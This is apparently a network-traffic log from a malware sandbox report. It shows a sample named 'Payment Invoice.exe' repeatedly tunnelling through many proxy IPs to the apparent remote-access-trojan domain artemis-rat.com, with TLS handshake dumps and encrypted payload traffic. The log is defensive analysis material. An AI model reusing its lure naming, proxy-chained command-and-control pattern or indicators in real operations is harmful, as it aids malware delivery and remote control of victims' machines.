                                                                Mar 11, 2024 16:15:18.824028015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.824552059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.826639891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.824129105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.824443102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.621306896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                608192.168.2.451934185.162.228.154807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.869386911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.024000883 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                609192.168.2.451705213.202.230.241807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.871984959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.192205906 CET76INHTTP/1.0 200 Connection Established
                                                                Proxy-agent: Apache/2.4.52 (Ubuntu)
                                                                Mar 11, 2024 16:15:17.197374105 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 03 e3 36 ab 4c fb 2b 63 33 16 97 4a 0a 00 88 ec 8e de 7d 37 5d 0e 71 eb 38 8b 77 7e 9e 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: lhe 6L+c3J}7]q8w~*,+0/$#('=<5/artemis-rat.com#&W!Jx%uFPIF ^g2.LN7C'.'2$L}KoBFF
                                                                Mar 11, 2024 16:15:17.516757965 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ef 20 05 5c 39 cb 5a 63 f9 4e c7 a0 64 1f b5 ba eb 96 a1 69 d5 53 f6 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                Data Ascii: C?e \9ZcNdiSDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                Mar 11, 2024 16:15:17.517065048 CET162INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5
                                                                Mar 11, 2024 16:15:17.517079115 CET1286INData Raw: 7c f0 30 c1 81 dd bd 46 3c 84 41 91 c0 f9 72 70 be e9 27 7e 00 05 90 30 82 05 8c 30 82 03 74 a0 03 02 01 02 02 0d 02 03 bc 50 a3 27 53 f0 91 80 22 ed f1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31
                                                                Data Ascii: |0F<Arp'~00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P5
                                                                Mar 11, 2024 16:15:17.517092943 CET1286INData Raw: 67 99 90 77 37 0a 97 2d c5 1c 1e f4 d0 5b e9 15 e3 ea 02 09 c8 13 d7 13 70 65 bf fb 88 9b 5a 25 be 77 09 e1 a7 6a 4e 11 75 b9 1e 4d f1 00 1b 6a 66 79 8e c3 6e d8 6d a2 22 a2 6d 05 fb 2c f2 f1 50 e5 a0 d1 d8 9f 35 7d fc 70 ab 59 2a 02 f1 be b0 d3
                                                                Data Ascii: gw7-[peZ%wjNuMjfynm"m,P5}pY*j%[ @4 awHI)adcGF9sO+Xe Uon=zcmf0b0Jwl6!X0*H0W10UBE10UGlobalS
                                                                Mar 11, 2024 16:15:17.517352104 CET574INData Raw: 82 01 01 00 34 a4 1e b1 28 a3 d0 b4 76 17 a6 31 7a 21 e9 d1 52 3e c8 db 74 16 41 88 b8 3d 35 1d ed e4 ff 93 e1 5c 5f ab bb ea 7c cf db e4 0d d1 8b 57 f2 26 6f 5b be 17 46 68 94 37 6f 6b 7a c8 c0 18 37 fa 25 51 ac ec 68 bf b2 c8 49 fd 5a 9a ca 01
                                                                Data Ascii: 4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$
                                                                Mar 11, 2024 16:15:17.526329041 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 87 97 87 0f 8e 38 e9 7d 78 ed 4f f7 76 2c e0 c4 dc 5f 94 ed 5c a0 94 5e fc 80 89 bd b9 66 5c 55 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 8c 4a 69 a3 0c d3 ce 28 41 b4 58 7b 04 e6 12 d8 16 6f ee 24 f8
                                                                Data Ascii: %! 8}xOv,_\^f\U(Ji(AX{o$qC\
                                                                Mar 11, 2024 16:15:17.841244936 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 7b 3c d8 c2 3b 03 4c 5a 55 f3 c6 3d 52 c3 db cd ab f1 99 d8 bd f1 30 78 fe 1b 5d ad 83 29 af b6 0b ad cc dd ff 87 00 a1 c4 3e 2c 93 35 8c ae a8 1c 01 6e 98 ee ad e0 31 74 50 e4 f0 b7 2f 9c 7b db f0 37
                                                                Data Ascii: {<;LZU=R0x])>,5n1tP/{7{~k,TW&$_tK_`^XDMD}sf2lB,U#R"u)a[F^}HCHKMMe( >a[*HIO
                                                                Mar 11, 2024 16:15:18.027540922 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 45 f9 00 11 f2 e8 bc 0f 45 8e 72 13 cf 60 1d 62 ce 2a 7e 2c 0f 70 1a d0 7a c2 d7 73 9e 4b 02 cd 02 0f de a6 35 f4 e6 bb be 10 df 47 21 dc 1f 9c 3a 4f b5 01 7f 47 ab 1c 09 ab a5 75 40 f7 b6 4e 80 03 4e 1d b4
                                                                Data Ascii: EEr`b*~,pzsK5G!:OGu@NN\jT"tJ,>& s(}.X=g:'/iR#G59Fo z(Q(e}rOb;Mq<&hzc}xp/!p>=`HD-dG
                                                                Mar 11, 2024 16:15:18.677340984 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 45 f9 00 11 f2 e8 bc 0f 45 8e 72 13 cf 60 1d 62 ce 2a 7e 2c 0f 70 1a d0 7a c2 d7 73 9e 4b 02 cd 02 0f de a6 35 f4 e6 bb be 10 df 47 21 dc 1f 9c 3a 4f b5 01 7f 47 ab 1c 09 ab a5 75 40 f7 b6 4e 80 03 4e 1d b4
                                                                Data Ascii: EEr`b*~,pzsK5G!:OGu@NN\jT"tJ,>& s(}.X=g:'/iR#G59Fo z(Q(e}rOb;Mq<&hzc}xp/!p>=`HD-dG


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                610192.168.2.451866192.171.119.166531497076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.874361992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                611192.168.2.451741218.252.244.126807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.878442049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                612192.168.2.451979104.17.50.45807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.881980896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.036149979 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                613192.168.2.45183666.45.246.19488887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.884299040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                614192.168.2.45184067.43.227.22724117076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.889024973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.269260883 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                615192.168.2.451862107.180.88.41580377076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.894294977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.523756027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.265489101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.589611053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.248903036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.880323887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.589448929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                616192.168.2.451169124.163.236.5473027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.905208111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.390971899 CET90INHTTP/1.1 200 OK
                                                                Content-Type: application/json
                                                                Connection: close
                                                                Content-Length: 55


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                617192.168.2.451798221.153.92.39807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.905914068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                618192.168.2.451608218.57.210.18690027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.908267975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.304209948 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 14:57:34 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                619192.168.2.451730176.99.2.4310817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.914990902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.280430079 CET228INHTTP/1.0 502 Bad Gateway
                                                                Connection: close
                                                                Content-type: text/html; charset=utf-8
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                620192.168.2.451820211.222.252.187807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.924746990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                621192.168.2.4517474.144.161.159807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.924756050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.021440029 CET59INHTTP/1.1 200 Connection Established
                                                                Proxy-agent: nginx
                                                                Mar 11, 2024 16:15:18.024667978 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 04 67 a0 c9 5f 74 8a 41 28 e2 fe 8d a0 4d a3 51 0b 91 e0 74 88 69 57 be c7 f0 d4 b2 92 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: e g_tA(MQtiW*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:18.367366076 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ef 20 06 aa 30 cd fe 75 f4 da 10 7f bf 47 24 79 a1 de 6c 89 6a e3 25 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                Data Ascii: C?e 0uG$ylj%DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                Mar 11, 2024 16:15:18.372972965 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                Mar 11, 2024 16:15:18.372987986 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                Mar 11, 2024 16:15:18.373034000 CET372INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                                                                Mar 11, 2024 16:15:18.373047113 CET364INData Raw: 19 94 55 6c d4 29 b2 0d c1 66 5b e2 77 49 48 28 ed 9d d7 1a 33 72 53 b3 82 35 cf 62 8b c9 24 8b a5 b7 39 0c bb 7e 2a 41 bf 52 cf fc a2 96 b6 c2 82 3f 16 03 03 01 2c 0c 00 01 28 03 00 1d 20 9f 6a 4a 66 31 12 4c 5c ea 24 44 67 46 f7 de 07 80 a6 c8
                                                                Data Ascii: Ul)f[wIH(3rS5b$9~*AR?,( jJf1L\$DgF?z3,^U}PN&A%#"AY?Wq60wT)4t#NW{;J#+.6D3=WE89+fj}O{x)`qyTGCBmqtq
                                                                Mar 11, 2024 16:15:18.379956961 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 64 8b 4a 26 c1 fa 6a 75 43 ab d3 4f f1 a7 f9 6a f6 cd 75 1a 12 47 12 91 ca e4 a0 a8 9e ea 32 0c 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 2d 1c 8d b4 9c 31 09 83 fe 4c d4 5e 99 b3 05 6d c8 a6 b6 f0 98
                                                                Data Ascii: %! dJ&juCOjuG2(-1L^mn^t
                                                                Mar 11, 2024 16:15:18.718590021 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 fe da 02 3d 4a 01 14 c2 d9 2a 3d f5 f5 3b 09 eb 02 6f cd 94 67 c7 2c 33 20 66 c0 e7 96 4e bd ff 8b 4f 1c 79 6e 00 13 bb 2c 03 77 34 e8 45 1f 35 cc 91 9c 99 a3 75 cc 0c 5c cd 5f 8e 24 d0 4c 3c 91 79 f7
                                                                Data Ascii: =J*=;og,3 fNOyn,w4E5u\_$L<y4Wn#wo^UJ*'%x8~j i^5+d-l|UJmU(Z3k_+,^:fKSGrKB([KF'(s%<
                                                                Mar 11, 2024 16:15:18.823122025 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 4e 49 ff 13 3c 0a 3d 8a c4 f4 d5 72 12 8f 54 db 79 61 cd ea 89 75 6d 38 f9 59 64 ba 22 46 f0 dd 5c 51 99 dd bc 6d 81 3d 5c be a6 df 3d a1 e6 52 2d 41 5b f7 08 f0 64 b1 ee 02 eb 1d 66 91 4b b3 87 81 64 4c 61
                                                                Data Ascii: NI<=rTyaum8Yd"F\Qm=\=R-A[dfKdLa}hS5"2Lc8J^e^Qs*|]jpH{Ja?Hz3\q3?[iM#0?^^xZ*[Ka+eQqt!Eb?Sf;M;f
                                                                Mar 11, 2024 16:15:19.167180061 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 af b6 89 df 33 7e c6 1d 97 d6 4a a8 66 04 60 15 a1 12 6f 03 54 39 b6 42 cf c2 03 3b 49 62 21 f8 47 d8 5a c8 f1 00 51 53 67 21 a1 ad 6e 3d 56 42 1b 13 45 ec f9 c7 2b 3b b1 4f 56 35 69 e6 0c 5a 13 72 3d 1f 2a
                                                                Data Ascii: q3~Jf`oT9B;Ib!GZQSg!n=VBE+;OV5iZr=*|!@8I#S-S:p8$5wmG{vKd/|piQc7wd*[$EF{}3i@GGkqi,\F*Qw(c_r<


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
